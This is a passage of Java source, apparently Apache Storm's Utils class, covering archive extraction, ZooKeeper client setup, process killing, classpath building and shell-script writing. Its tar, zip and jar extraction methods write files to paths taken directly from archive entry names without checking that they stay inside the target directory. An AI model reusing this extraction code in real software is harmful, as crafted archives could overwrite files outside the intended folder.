TarArchiveEntry entry, File outputDir) throws IOException {
if (entry.isDirectory()) {
File subDir = new File(outputDir, entry.getName());
if (!subDir.mkdirs() && !subDir.isDirectory()) {
throw new IOException("Mkdirs failed to create tar internal dir "
+ outputDir);
}
for (TarArchiveEntry e : entry.getDirectoryEntries()) {
unpackEntries(tis, e, subDir);
}
return;
}
File outputFile = new File(outputDir, entry.getName());
if (!outputFile.getParentFile().exists()) {
if (!outputFile.getParentFile().mkdirs()) {
throw new IOException("Mkdirs failed to create tar internal dir "
+ outputDir);
}
}
int count;
byte data[] = new byte[2048];
BufferedOutputStream outputStream = new BufferedOutputStream(
new FileOutputStream(outputFile));
while ((count = tis.read(data)) != -1) {
outputStream.write(data, 0, count);
}
outputStream.flush();
outputStream.close();
}
public static boolean isOnWindows() {
if (System.getenv("OS") != null) {
return System.getenv("OS").equals("Windows_NT");
}
return false;
}
public static boolean isAbsolutePath(String path) {
return Paths.get(path).isAbsolute();
}
public static void unpack(File localrsrc, File dst) throws IOException {
String lowerDst = localrsrc.getName().toLowerCase();
if (lowerDst.endsWith(".jar")) {
unJar(localrsrc, dst);
} else if (lowerDst.endsWith(".zip")) {
unZip(localrsrc, dst);
} else if (lowerDst.endsWith(".tar.gz") ||
lowerDst.endsWith(".tgz") ||
lowerDst.endsWith(".tar")) {
unTar(localrsrc, dst);
} else {
LOG.warn("Cannot unpack " + localrsrc);
if (!localrsrc.renameTo(dst)) {
throw new IOException("Unable to rename file: [" + localrsrc
+ "] to [" + dst + "]");
}
}
if (localrsrc.isFile()) {
localrsrc.delete();
}
}
public static boolean canUserReadBlob(ReadableBlobMeta meta, String user) {
SettableBlobMeta settable = meta.get_settable();
for (AccessControl acl : settable.get_acl()) {
if (acl.get_type().equals(AccessControlType.OTHER) && (acl.get_access() & BlobStoreAclHandler.READ) > 0) {
return true;
}
if (acl.get_name().equals(user) && (acl.get_access() & BlobStoreAclHandler.READ) > 0) {
return true;
}
}
return false;
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, String root) {
return newCurator(conf, servers, port, root, null);
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, ZookeeperAuthInfo auth) {
return newCurator(conf, servers, port, "", auth);
}
public static CuratorFramework newCurator(Map conf, List<String> servers, Object port, String root, ZookeeperAuthInfo auth) {
List<String> serverPorts = new ArrayList<String>();
for (String zkServer : servers) {
serverPorts.add(zkServer + ":" + Utils.getInt(port));
}
String zkStr = StringUtils.join(serverPorts, ",") + root;
CuratorFrameworkFactory.Builder builder = CuratorFrameworkFactory.builder();
setupBuilder(builder, zkStr, conf, auth);
return builder.build();
}
protected static void setupBuilder(CuratorFrameworkFactory.Builder builder, final String zkStr, Map conf, ZookeeperAuthInfo auth)
{
List<String> exhibitorServers = getStrings(conf.get(Config.STORM_EXHIBITOR_SERVERS));
if (!exhibitorServers.isEmpty()) {
// use exhibitor servers
builder.ensembleProvider(new ExhibitorEnsembleProvider(
new Exhibitors(exhibitorServers, Utils.getInt(conf.get(Config.STORM_EXHIBITOR_PORT)),
new Exhibitors.BackupConnectionStringProvider() {
@Override
public String getBackupConnectionString() throws Exception {
// use zk servers as backup if they exist
return zkStr;
}}),
new DefaultExhibitorRestClient(),
Utils.getString(conf.get(Config.STORM_EXHIBITOR_URIPATH)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_POLL)),
new StormBoundedExponentialBackoffRetry(
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_INTERVAL)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_INTERVAL_CEILING)),
Utils.getInt(conf.get(Config.STORM_EXHIBITOR_RETRY_TIMES)))));
} else {
builder.connectString(zkStr);
}
builder
.connectionTimeoutMs(Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_CONNECTION_TIMEOUT)))
.sessionTimeoutMs(Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_SESSION_TIMEOUT)))
.retryPolicy(new StormBoundedExponentialBackoffRetry(
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_INTERVAL)),
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_INTERVAL_CEILING)),
Utils.getInt(conf.get(Config.STORM_ZOOKEEPER_RETRY_TIMES))));
if (auth != null && auth.scheme != null && auth.payload != null) {
builder.authorization(auth.scheme, auth.payload);
}
}
public static void testSetupBuilder(CuratorFrameworkFactory.Builder
builder, String zkStr, Map conf, ZookeeperAuthInfo auth)
{
setupBuilder(builder, zkStr, conf, auth);
}
public static CuratorFramework newCuratorStarted(Map conf, List<String> servers, Object port, String root, ZookeeperAuthInfo auth) {
CuratorFramework ret = newCurator(conf, servers, port, root, auth);
ret.start();
return ret;
}
public static CuratorFramework newCuratorStarted(Map conf, List<String> servers, Object port, ZookeeperAuthInfo auth) {
CuratorFramework ret = newCurator(conf, servers, port, auth);
ret.start();
return ret;
}
public static TreeMap<Integer, Integer> integerDivided(int sum, int numPieces) {
int base = sum / numPieces;
int numInc = sum % numPieces;
int numBases = numPieces - numInc;
TreeMap<Integer, Integer> ret = new TreeMap<Integer, Integer>();
ret.put(base, numBases);
if (numInc != 0) {
ret.put(base+1, numInc);
}
return ret;
}
public static byte[] toByteArray(ByteBuffer buffer) {
byte[] ret = new byte[buffer.remaining()];
buffer.get(ret, 0, ret.length);
return ret;
}
public static void readAndLogStream(String prefix, InputStream in) {
try {
BufferedReader r = new BufferedReader(new InputStreamReader(in));
String line = null;
while ((line = r.readLine()) != null) {
LOG.info("{}:{}", prefix, line);
}
} catch (IOException e) {
LOG.warn("Error while trying to log stream", e);
}
}
/**
* Checks if a throwable is an instance of a particular class
* @param klass The class you're expecting
* @param throwable The throwable you expect to be an instance of klass
* @return true if throwable is instance of klass, false otherwise.
*/
public static boolean exceptionCauseIsInstanceOf(Class klass, Throwable throwable) {
Throwable t = throwable;
while (t != null) {
if (klass.isInstance(t)) {
return true;
}
t = t.getCause();
}
return false;
}
/**
* Is the cluster configured to interact with ZooKeeper in a secure way?
* This only works when called from within Nimbus or a Supervisor process.
* @param conf the storm configuration, not the topology configuration
* @return true if it is configured else false.
*/
public static boolean isZkAuthenticationConfiguredStormServer(Map conf) {
return null != System.getProperty("java.security.auth.login.config")
|| (conf != null
&& conf.get(Config.STORM_ZOOKEEPER_AUTH_SCHEME) != null
&& !((String)conf.get(Config.STORM_ZOOKEEPER_AUTH_SCHEME)).isEmpty());
}
/**
* Is the topology configured to have ZooKeeper authentication.
* @param conf the topology configuration
* @return true if ZK is configured else false
*/
public static boolean isZkAuthenticationConfiguredTopology(Map conf) {
return (conf != null
&& conf.get(Config.STORM_ZOOKEEPER_TOPOLOGY_AUTH_SCHEME) != null
&& !((String)conf.get(Config.STORM_ZOOKEEPER_TOPOLOGY_AUTH_SCHEME)).isEmpty());
}
public static List<ACL> getWorkerACL(Map conf) {
//This is a work around to an issue with ZK where a sasl super user is not super unless there is an open SASL ACL so we are trying to give the correct perms
if (!isZkAuthenticationConfiguredTopology(conf)) {
return null;
}
String stormZKUser = (String)conf.get(Config.STORM_ZOOKEEPER_SUPERACL);
if (stormZKUser == null) {
throw new IllegalArgumentException("Authentication is enabled but " + Config.STORM_ZOOKEEPER_SUPERACL + " is not set");
}
String[] split = stormZKUser.split(":", 2);
if (split.length != 2) {
throw new IllegalArgumentException(Config.STORM_ZOOKEEPER_SUPERACL + " does not appear to be in the form scheme:acl, i.e. sasl:storm-user");
}
ArrayList<ACL> ret = new ArrayList<ACL>(ZooDefs.Ids.CREATOR_ALL_ACL);
ret.add(new ACL(ZooDefs.Perms.ALL, new Id(split[0], split[1])));
return ret;
}
/**
* Takes an input dir or file and returns the disk usage on that local directory.
* Very basic implementation.
*
* @param dir The input dir to get the disk space of this local dir
* @return The total disk space of the input local directory
*/
public static long getDU(File dir) {
long size = 0;
if (!dir.exists())
return 0;
if (!dir.isDirectory()) {
return dir.length();
} else {
File[] allFiles = dir.listFiles();
if(allFiles != null) {
for (int i = 0; i < allFiles.length; i++) {
boolean isSymLink;
try {
isSymLink = org.apache.commons.io.FileUtils.isSymlink(allFiles[i]);
} catch(IOException ioe) {
isSymLink = true;
}
if(!isSymLink) {
size += getDU(allFiles[i]);
}
}
}
return size;
}
}
/**
* Gets some information, including stack trace, for a running thread.
* @return A human-readable string of the dump.
*/
public static String threadDump() {
final StringBuilder dump = new StringBuilder();
final java.lang.management.ThreadMXBean threadMXBean = java.lang.management.ManagementFactory.getThreadMXBean();
final java.lang.management.ThreadInfo[] threadInfos = threadMXBean.getThreadInfo(threadMXBean.getAllThreadIds(), 100);
for (java.lang.management.ThreadInfo threadInfo : threadInfos) {
dump.append('"');
dump.append(threadInfo.getThreadName());
dump.append("\" ");
final Thread.State state = threadInfo.getThreadState();
dump.append("\n java.lang.Thread.State: ");
dump.append(state);
final StackTraceElement[] stackTraceElements = threadInfo.getStackTrace();
for (final StackTraceElement stackTraceElement : stackTraceElements) {
dump.append("\n at ");
dump.append(stackTraceElement);
}
dump.append("\n\n");
}
return dump.toString();
}
/**
* Creates an instance of the pluggable SerializationDelegate or falls back to
* DefaultSerializationDelegate if something goes wrong.
* @param stormConf The config from which to pull the name of the pluggable class.
* @return an instance of the class specified by storm.meta.serialization.delegate
*/
private static SerializationDelegate getSerializationDelegate(Map stormConf) {
String delegateClassName = (String)stormConf.get(Config.STORM_META_SERIALIZATION_DELEGATE);
SerializationDelegate delegate;
try {
Class delegateClass = Class.forName(delegateClassName);
delegate = (SerializationDelegate) delegateClass.newInstance();
} catch (ClassNotFoundException | InstantiationException | IllegalAccessException e) {
LOG.error("Failed to construct serialization delegate, falling back to default", e);
delegate = new DefaultSerializationDelegate();
}
delegate.prepare(stormConf);
return delegate;
}
public static void handleUncaughtException(Throwable t) {
if (t != null && t instanceof Error) {
if (t instanceof OutOfMemoryError) {
try {
System.err.println("Halting due to Out Of Memory Error..." + Thread.currentThread().getName());
} catch (Throwable err) {
//Again we don't want to exit because of logging issues.
}
Runtime.getRuntime().halt(-1);
} else {
//Running in daemon mode, we would pass Error to calling thread.
throw (Error) t;
}
}
}
/**
* Given a File input it will unzip the file in a the unzip directory
* passed as the second parameter
* @param inFile The zip file as input
* @param unzipDir The unzip directory where to unzip the zip file.
* @throws IOException
*/
public static void unZip(File inFile, File unzipDir) throws IOException {
Enumeration<? extends ZipEntry> entries;
ZipFile zipFile = new ZipFile(inFile);
try {
entries = zipFile.entries();
while (entries.hasMoreElements()) {
ZipEntry entry = entries.nextElement();
if (!entry.isDirectory()) {
InputStream in = zipFile.getInputStream(entry);
try {
File file = new File(unzipDir, entry.getName());
if (!file.getParentFile().mkdirs()) {
if (!file.getParentFile().isDirectory()) {
throw new IOException("Mkdirs failed to create " +
file.getParentFile().toString());
}
}
OutputStream out = new FileOutputStream(file);
try {
byte[] buffer = new byte[8192];
int i;
while ((i = in.read(buffer)) != -1) {
out.write(buffer, 0, i);
}
} finally {
out.close();
}
} finally {
in.close();
}
}
}
} finally {
zipFile.close();
}
}
/**
* Given a zip File input it will return its size
* Only works for zip files whose uncompressed size is less than 4 GB,
* otherwise returns the size module 2^32, per gzip specifications
* @param myFile The zip file as input
* @throws IOException
* @return zip file size as a long
*/
public static long zipFileSize(File myFile) throws IOException{
RandomAccessFile raf = new RandomAccessFile(myFile, "r");
raf.seek(raf.length() - 4);
long b4 = raf.read();
long b3 = raf.read();
long b2 = raf.read();
long b1 = raf.read();
long val = (b1 << 24) | (b2 << 16) + (b3 << 8) + b4;
raf.close();
return val;
}
public static double zeroIfNaNOrInf(double x) {
return (Double.isNaN(x) || Double.isInfinite(x)) ? 0.0 : x;
}
/**
* parses the arguments to extract jvm heap memory size in MB.
* @param input
* @param defaultValue
* @return the value of the JVM heap memory setting (in MB) in a java command.
*/
public static Double parseJvmHeapMemByChildOpts(String input, Double defaultValue) {
if (input != null) {
Pattern optsPattern = Pattern.compile("Xmx[0-9]+[mkgMKG]");
Matcher m = optsPattern.matcher(input);
String memoryOpts = null;
while (m.find()) {
memoryOpts = m.group();
}
if (memoryOpts != null) {
int unit = 1;
memoryOpts = memoryOpts.toLowerCase();
if (memoryOpts.endsWith("k")) {
unit = 1024;
} else if (memoryOpts.endsWith("m")) {
unit = 1024 * 1024;
} else if (memoryOpts.endsWith("g")) {
unit = 1024 * 1024 * 1024;
}
memoryOpts = memoryOpts.replaceAll("[a-zA-Z]", "");
Double result = Double.parseDouble(memoryOpts) * unit / 1024.0 / 1024.0;
return (result < 1.0) ? 1.0 : result;
} else {
return defaultValue;
}
} else {
return defaultValue;
}
}
@VisibleForTesting
public static void setClassLoaderForJavaDeSerialize(ClassLoader cl) {
Utils.cl = cl;
}
@VisibleForTesting
public static void resetClassLoaderForJavaDeSerialize() {
Utils.cl = ClassLoader.getSystemClassLoader();
}
public static TopologyInfo getTopologyInfo(String name, String asUser, Map stormConf) {
try (NimbusClient client = NimbusClient.getConfiguredClientAs(stormConf, asUser)) {
String topologyId = getTopologyId(name, client.getClient());
if (null != topologyId) {
return client.getClient().getTopologyInfo(topologyId);
}
return null;
} catch(Exception e) {
throw new RuntimeException(e);
}
}
public static String getTopologyId(String name, Nimbus.Client client) {
try {
ClusterSummary summary = client.getClusterInfo();
for(TopologySummary s : summary.get_topologies()) {
if(s.get_name().equals(name)) {
return s.get_id();
}
}
} catch(Exception e) {
throw new RuntimeException(e);
}
return null;
}
/**
* A cheap way to deterministically convert a number to a positive value. When the input is
* positive, the original value is returned. When the input number is negative, the returned
* positive value is the original value bit AND against Integer.MAX_VALUE(0x7fffffff) which
* is not its absolutely value.
*
* @param number a given number
* @return a positive number.
*/
public static int toPositive(int number) {
return number & Integer.MAX_VALUE;
}
public static GlobalStreamId getGlobalStreamId(String streamId, String componentId) {
if (componentId == null) {
return new GlobalStreamId(streamId, DEFAULT_STREAM_ID);
}
return new GlobalStreamId(streamId, componentId);
}
public static RuntimeException wrapInRuntime(Exception e){
if (e instanceof RuntimeException){
return (RuntimeException)e;
} else {
return new RuntimeException(e);
}
}
public static int getAvailablePort(int prefferedPort) {
int localPort = -1;
try(ServerSocket socket = new ServerSocket(prefferedPort)) {
localPort = socket.getLocalPort();
} catch(IOException exp) {
if (prefferedPort > 0) {
return getAvailablePort(0);
}
}
return localPort;
}
public static int getAvailablePort() {
return getAvailablePort(0);
}
/**
* Determines if a zip archive contains a particular directory.
*
* @param zipfile path to the zipped file
* @param target directory being looked for in the zip.
* @return boolean whether or not the directory exists in the zip.
*/
public static boolean zipDoesContainDir(String zipfile, String target) throws IOException {
List<ZipEntry> entries = (List<ZipEntry>) Collections.list(new ZipFile(zipfile).entries());
String targetDir = target + "/";
for(ZipEntry entry : entries) {
String name = entry.getName();
if(name.startsWith(targetDir)) {
return true;
}
}
return false;
}
/**
* Joins any number of maps together into a single map, combining their values into
* a list, maintaining values in the order the maps were passed in. Nulls are inserted
* for given keys when the map does not contain that key.
*
* i.e. joinMaps({'a' => 1, 'b' => 2}, {'b' => 3}, {'a' => 4, 'c' => 5}) ->
* {'a' => [1, null, 4], 'b' => [2, 3, null], 'c' => [null, null, 5]}
*
* @param maps variable number of maps to join - order affects order of values in output.
* @return combined map
*/
public static <K, V> Map<K, List<V>> joinMaps(Map<K, V>... maps) {
Map<K, List<V>> ret = new HashMap<>();
Set<K> keys = new HashSet<>();
for(Map<K, V> map : maps) {
keys.addAll(map.keySet());
}
for(Map<K, V> m : maps) {
for(K key : keys) {
V value = m.get(key);
if(!ret.containsKey(key)) {
ret.put(key, new ArrayList<V>());
}
List<V> targetList = ret.get(key);
targetList.add(value);
}
}
return ret;
}
/**
* Fills up chunks out of a collection (given a maximum amount of chunks)
*
* i.e. partitionFixed(5, [1,2,3]) -> [[1,2,3]]
* partitionFixed(5, [1..9]) -> [[1,2], [3,4], [5,6], [7,8], [9]]
* partitionFixed(3, [1..10]) -> [[1,2,3,4], [5,6,7], [8,9,10]]
* @param maxNumChunks the maximum number of chunks to return
* @param coll the collection to be chunked up
* @return a list of the chunks, which are themselves lists.
*/
public static <T> List<List<T>> partitionFixed(int maxNumChunks, Collection<T> coll) {
List<List<T>> ret = new ArrayList<>();
if(maxNumChunks == 0 || coll == null) {
return ret;
}
Map<Integer, Integer> parts = integerDivided(coll.size(), maxNumChunks);
// Keys sorted in descending order
List<Integer> sortedKeys = new ArrayList<Integer>(parts.keySet());
Collections.sort(sortedKeys, Collections.reverseOrder());
Iterator<T> it = coll.iterator();
for(Integer chunkSize : sortedKeys) {
if(!it.hasNext()) { break; }
Integer times = parts.get(chunkSize);
for(int i = 0; i < times; i++) {
if(!it.hasNext()) { break; }
List<T> chunkList = new ArrayList<>();
for(int j = 0; j < chunkSize; j++) {
if(!it.hasNext()) { break; }
chunkList.add(it.next());
}
ret.add(chunkList);
}
}
return ret;
}
/**
* Return a new instance of a pluggable specified in the conf.
* @param conf The conf to read from.
* @param configKey The key pointing to the pluggable class
* @return an instance of the class or null if it is not specified.
*/
public static Object getConfiguredClass(Map conf, Object configKey) {
if (conf.containsKey(configKey)) {
return newInstance((String)conf.get(configKey));
}
return null;
}
public static String logsFilename(String stormId, String port) {
return stormId + FILE_PATH_SEPARATOR + port + FILE_PATH_SEPARATOR + "worker.log";
}
public static String eventLogsFilename(String stormId, String port) {
return stormId + FILE_PATH_SEPARATOR + port + FILE_PATH_SEPARATOR + "events.log";
}
public static Object readYamlFile(String yamlFile) {
try (FileReader reader = new FileReader(yamlFile)) {
return new Yaml(new SafeConstructor()).load(reader);
} catch(Exception ex) {
LOG.error("Failed to read yaml file.", ex);
}
return null;
}
public static void setupDefaultUncaughtExceptionHandler() {
Thread.setDefaultUncaughtExceptionHandler(new Thread.UncaughtExceptionHandler() {
public void uncaughtException(Thread thread, Throwable thrown) {
try {
handleUncaughtException(thrown);
} catch (Error err) {
LOG.error("Received error in main thread.. terminating server...", err);
Runtime.getRuntime().exit(-2);
}
}
});
}
/**
* Creates a new map with a string value in the map replaced with an
* equivalently-lengthed string of '#'.
* @param m The map that a value will be redacted from
* @param key The key pointing to the value to be redacted
* @return a new map with the value redacted. The original map will not be modified.
*/
public static Map<Object, String> redactValue(Map<Object, String> m, Object key) {
if(m.containsKey(key)) {
HashMap<Object, String> newMap = new HashMap<>(m);
String value = newMap.get(key);
String redacted = new String(new char[value.length()]).replace("\0", "#");
newMap.put(key, redacted);
return newMap;
}
return m;
}
/**
* Make sure a given key name is valid for the storm config.
* Throw RuntimeException if the key isn't valid.
* @param name The name of the config key to check.
*/
private static final Set<String> disallowedKeys = new HashSet<>(Arrays.asList(new String[] {"/", ".", ":", "\\"}));
public static void validateKeyName(String name) {
for(String key : disallowedKeys) {
if( name.contains(key) ) {
throw new RuntimeException("Key name cannot contain any of the following: " + disallowedKeys.toString());
}
}
if(name.trim().isEmpty()) {
throw new RuntimeException("Key name cannot be blank");
}
}
/**
* Find the first item of coll for which pred.test(...) returns true.
* @param pred The IPredicate to test for
* @param coll The Collection of items to search through.
* @return The first matching value in coll, or null if nothing matches.
*/
public static <T> T findOne (IPredicate<T> pred, Collection<T> coll) {
if(coll == null) {
return null;
}
for(T elem : coll) {
if (pred.test(elem)) {
return elem;
}
}
return null;
}
public static <T, U> T findOne (IPredicate<T> pred, Map<U, T> map) {
if(map == null) {
return null;
}
return findOne(pred, (Set<T>) map.entrySet());
}
public static String localHostname () throws UnknownHostException {
return _instance.localHostnameImpl();
}
// Non-static impl methods exist for mocking purposes.
protected String localHostnameImpl () throws UnknownHostException {
return InetAddress.getLocalHost().getCanonicalHostName();
}
private static String memoizedLocalHostnameString = null;
public static String memoizedLocalHostname () throws UnknownHostException {
if (memoizedLocalHostnameString == null) {
memoizedLocalHostnameString = localHostname();
}
return memoizedLocalHostnameString;
}
/**
* Gets the storm.local.hostname value, or tries to figure out the local hostname
* if it is not set in the config.
* @param conf The storm config to read from
* @return a string representation of the hostname.
*/
public static String hostname (Map<String, Object> conf) throws UnknownHostException {
if (conf == null) {
return memoizedLocalHostname();
}
Object hostnameString = conf.get(Config.STORM_LOCAL_HOSTNAME);
if (hostnameString == null || hostnameString.equals("")) {
return memoizedLocalHostname();
}
return (String)hostnameString;
}
public static String uuid() {
return UUID.randomUUID().toString();
}
public static void exitProcess (int val, String msg) {
String combinedErrorMessage = "Halting process: " + msg;
LOG.error(combinedErrorMessage, new RuntimeException(combinedErrorMessage));
Runtime.getRuntime().exit(val);
}
/**
* "{:a 1 :b 1 :c 2} -> {1 [:a :b] 2 :c}"
*
* Example usage in java:
* Map<Integer, String> tasks;
* Map<String, List<Integer>> componentTasks = Utils.reverse_map(tasks);
*
* The order of he resulting list values depends on the ordering properties
* of the Map passed in. The caller is responsible for passing an ordered
* map if they expect the result to be consistently ordered as well.
*
* @param map to reverse
* @return a reversed map
*/
public static <K, V> HashMap<V, List<K>> reverseMap(Map<K, V> map) {
HashMap<V, List<K>> rtn = new HashMap<V, List<K>>();
if (map == null) {
return rtn;
}
for (Entry<K, V> entry : map.entrySet()) {
K key = entry.getKey();
V val = entry.getValue();
List<K> list = rtn.get(val);
if (list == null) {
list = new ArrayList<K>();
rtn.put(entry.getValue(), list);
}
list.add(key);
}
return rtn;
}
/**
* "[[:a 1] [:b 1] [:c 2]} -> {1 [:a :b] 2 :c}"
* Reverses an assoc-list style Map like reverseMap(Map...)
*
* @param listSeq to reverse
* @return a reversed map
*/
public static HashMap reverseMap(List listSeq) {
HashMap<Object, List<Object>> rtn = new HashMap();
if (listSeq == null) {
return rtn;
}
for (Object entry : listSeq) {
List listEntry = (List) entry;
Object key = listEntry.get(0);
Object val = listEntry.get(1);
List list = rtn.get(val);
if (list == null) {
list = new ArrayList<Object>();
rtn.put(val, list);
}
list.add(key);
}
return rtn;
}
/**
* @return the pid of this JVM, because Java doesn't provide a real way to do this.
*/
public static String processPid() {
String name = ManagementFactory.getRuntimeMXBean().getName();
String[] split = name.split("@");
if (split.length != 2) {
throw new RuntimeException("Got unexpected process name: " + name);
}
return split[0];
}
public static int execCommand(String... command) throws ExecuteException, IOException {
CommandLine cmd = new CommandLine(command[0]);
for (int i = 1; i < command.length; i++) {
cmd.addArgument(command[i]);
}
DefaultExecutor exec = new DefaultExecutor();
return exec.execute(cmd);
}
/**
* Extract dir from the jar to destdir
*
* @param jarpath Path to the jar file
* @param dir Directory in the jar to pull out
* @param destdir Path to the directory where the extracted directory will be put
*
*/
public static void extractDirFromJar(String jarpath, String dir, String destdir) {
try (JarFile jarFile = new JarFile(jarpath)) {
Enumeration<JarEntry> jarEnums = jarFile.entries();
while (jarEnums.hasMoreElements()) {
JarEntry entry = jarEnums.nextElement();
if (!entry.isDirectory() && entry.getName().startsWith(dir)) {
File aFile = new File(destdir, entry.getName());
aFile.getParentFile().mkdirs();
try (FileOutputStream out = new FileOutputStream(aFile);
InputStream in = jarFile.getInputStream(entry)) {
IOUtils.copy(in, out);
}
}
}
} catch (IOException e) {
LOG.info("Could not extract {} from {}", dir, jarpath);
}
}
public static void sendSignalToProcess(long lpid, int signum) throws IOException {
String pid = Long.toString(lpid);
try {
if (isOnWindows()) {
if (signum == SIGKILL) {
execCommand("taskkill", "/f", "/pid", pid);
} else {
execCommand("taskkill", "/pid", pid);
}
} else {
execCommand("kill", "-" + signum, pid);
}
} catch (ExecuteException e) {
LOG.info("Error when trying to kill {}. Process is probably already dead.", pid);
} catch (IOException e) {
LOG.info("IOException Error when trying to kill {}.", pid);
throw e;
}
}
public static void forceKillProcess (String pid) throws IOException {
sendSignalToProcess(Long.parseLong(pid), SIGKILL);
}
public static void killProcessWithSigTerm (String pid) throws IOException {
sendSignalToProcess(Long.parseLong(pid), SIGTERM);
}
/**
* Adds the user supplied function as a shutdown hook for cleanup.
* Also adds a function that sleeps for a second and then halts the
* runtime to avoid any zombie process in case cleanup function hangs.
*/
public static void addShutdownHookWithForceKillIn1Sec (Runnable func) {
Runnable sleepKill = new Runnable() {
@Override
public void run() {
try {
Time.sleepSecs(1);
Runtime.getRuntime().halt(20);
} catch (Exception e) {
LOG.warn("Exception in the ShutDownHook", e);
}
}
};
Runtime.getRuntime().addShutdownHook(new Thread(func));
Runtime.getRuntime().addShutdownHook(new Thread(sleepKill));
}
/**
* Returns the combined string, escaped for posix shell.
* @param command the list of strings to be combined
* @return the resulting command string
*/
public static String shellCmd (List<String> command) {
List<String> changedCommands = new ArrayList<>(command.size());
for (String str: command) {
if (str == null) {
continue;
}
changedCommands.add("'" + str.replaceAll("'", "'\"'\"'") + "'");
}
return StringUtils.join(changedCommands, " ");
}
public static String scriptFilePath (String dir) {
return dir + FILE_PATH_SEPARATOR + "storm-worker-script.sh";
}
public static String containerFilePath (String dir) {
return dir + FILE_PATH_SEPARATOR + "launch_container.sh";
}
public static Object nullToZero (Object v) {
return (v != null ? v : 0);
}
/**
* Deletes a file or directory and its contents if it exists. Does not
* complain if the input is null or does not exist.
* @param path the path to the file or directory
*/
public static void forceDelete(String path) throws IOException {
_instance.forceDeleteImpl(path);
}
// Non-static impl methods exist for mocking purposes.
protected void forceDeleteImpl(String path) throws IOException {
LOG.debug("Deleting path {}", path);
if (checkFileExists(path)) {
try {
FileUtils.forceDelete(new File(path));
} catch (FileNotFoundException ignored) {}
}
}
/**
* Creates a symbolic link to the target
* @param dir the parent directory of the link
* @param targetDir the parent directory of the link's target
* @param targetFilename the file name of the links target
* @param filename the file name of the link
* @throws IOException
*/
public static void createSymlink(String dir, String targetDir,
String targetFilename, String filename) throws IOException {
Path path = Paths.get(dir, filename).toAbsolutePath();
Path target = Paths.get(targetDir, targetFilename).toAbsolutePath();
LOG.debug("Creating symlink [{}] to [{}]", path, target);
if (!path.toFile().exists()) {
Files.createSymbolicLink(path, target);
}
}
/**
* Convenience method for the case when the link's file name should be the
* same as the file name of the target
*/
public static void createSymlink(String dir, String targetDir,
String targetFilename) throws IOException {
Utils.createSymlink(dir, targetDir, targetFilename,
targetFilename);
}
/**
* Returns a Collection of file names found under the given directory.
* @param dir a directory
* @return the Collection of file names
*/
public static Collection<String> readDirContents(String dir) {
Collection<String> ret = new HashSet<>();
File[] files = new File(dir).listFiles();
if (files != null) {
for (File f: files) {
ret.add(f.getName());
}
}
return ret;
}
/**
* Returns the value of java.class.path System property. Kept separate for
* testing.
* @return the classpath
*/
public static String currentClasspath() {
return _instance.currentClasspathImpl();
}
// Non-static impl methods exist for mocking purposes.
public String currentClasspathImpl() {
return System.getProperty("java.class.path");
}
/**
* Returns a collection of jar file names found under the given directory.
* @param dir the directory to search
* @return the jar file names
*/
private static List<String> getFullJars(String dir) {
File[] files = new File(dir).listFiles(jarFilter);
if(files == null) {
return new ArrayList<>();
}
List<String> ret = new ArrayList<>(files.length);
for (File f : files) {
ret.add(Paths.get(dir, f.getName()).toString());
}
return ret;
}
private static final FilenameFilter jarFilter = new FilenameFilter() {
@Override
public boolean accept(File dir, String name) {
return name.endsWith(".jar");
}
};
public static String workerClasspath() {
String stormDir = System.getProperty("storm.home");
if (stormDir == null) {
return Utils.currentClasspath();
}
String stormLibDir = Paths.get(stormDir, "lib").toString();
String stormConfDir =
System.getenv("STORM_CONF_DIR") != null ?
System.getenv("STORM_CONF_DIR") :
Paths.get(stormDir, "conf").toString();
String stormExtlibDir = Paths.get(stormDir, "extlib").toString();
String extcp = System.getenv("STORM_EXT_CLASSPATH");
List<String> pathElements = new LinkedList<>();
pathElements.addAll(Utils.getFullJars(stormLibDir));
pathElements.addAll(Utils.getFullJars(stormExtlibDir));
pathElements.add(extcp);
pathElements.add(stormConfDir);
return StringUtils.join(pathElements,
CLASS_PATH_SEPARATOR);
}
public static String addToClasspath(String classpath,
Collection<String> paths) {
return _instance.addToClasspathImpl(classpath, paths);
}
// Non-static impl methods exist for mocking purposes.
public String addToClasspathImpl(String classpath,
Collection<String> paths) {
if (paths == null || paths.isEmpty()) {
return classpath;
}
List<String> l = new LinkedList<>();
l.add(classpath);
l.addAll(paths);
return StringUtils.join(l, CLASS_PATH_SEPARATOR);
}
public static class UptimeComputer {
int startTime = 0;
public UptimeComputer() {
startTime = Time.currentTimeSecs();
}
public int upTime() {
return Time.deltaSecs(startTime);
}
}
public static UptimeComputer makeUptimeComputer() {
return _instance.makeUptimeComputerImpl();
}
// Non-static impl methods exist for mocking purposes.
public UptimeComputer makeUptimeComputerImpl() {
return new UptimeComputer();
}
/**
* Writes a posix shell script file to be executed in its own process.
* @param dir the directory under which the script is to be written
* @param command the command the script is to execute
* @param environment optional environment variables to set before running the script's command. May be null.
* @return the path to the script that has been written
*/
public static String writeScript(String dir, List<String> command,
Map<String,String> environment) throws IOException {
String path = Utils.scriptFilePath(dir);
try(BufferedWriter out = new BufferedWriter(new FileWriter(path))) {
out.write("#!/bin/bash");
out.newLine();
if (environment != null) {
for (String k : environment.keySet()) {
String v = environment.get(k);
if (v == null) {
v = "";
}
out.write(Utils.shellCmd(
Arrays.asList(
"export",k+"="+v)));
out.write(";");
out.newLine();
}
}
out.newLine();
out.write("exec "+Utils.shellCmd(command)+";");
}
return path;
}
/**
* A thread that can answer if it is sleeping in the case of simulated time.
* This class is not useful when simulated time is not being used.
*/
public static class SmartThread extends Thread {
public boolean isSleeping() {
return Time.isThreadWaiting(this);
}
public SmartThread(Runnable r) {
super(r);
}
}
/**
* Creates a thread that calls the given code repeatedly, sleeping for an
* interval of seconds equal to the return value of the previous call.
*
* The given afn may be a callable that returns the number of seconds to
* sleep, or it may be a Callable that returns another Callable that in turn
* returns the number of seconds to sleep. In the latter case isFactory.
*
* @param afn the code to call on each iteration
* @param isDaemon whether the new thread should be a daemon thread
* @param eh code to call when afn throws an exception
* @param priority the new thread's priority
* @param isFactory whether afn returns a callable instead of sleep seconds
* @param startImmediately whether to start the thread before returning
* @param threadName a suffix to be appended to the thread name
